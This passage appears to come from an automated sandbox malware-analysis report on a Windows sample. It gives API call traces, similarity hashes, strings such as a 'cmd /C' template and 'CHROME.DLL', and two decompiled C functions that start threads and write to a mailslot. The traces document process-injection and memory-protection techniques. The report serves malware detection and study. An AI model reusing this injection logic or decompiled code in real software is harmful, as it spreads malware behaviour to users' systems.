    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:13FFE10E12298A4E8DC1EE7A0B003B93
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:58680
Initial sample SHA 256:75D846C690C188A3CC6A2E226FDD42AF8A1351B07FB56795106285178B0A0AA7
Initial sample name:sample.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
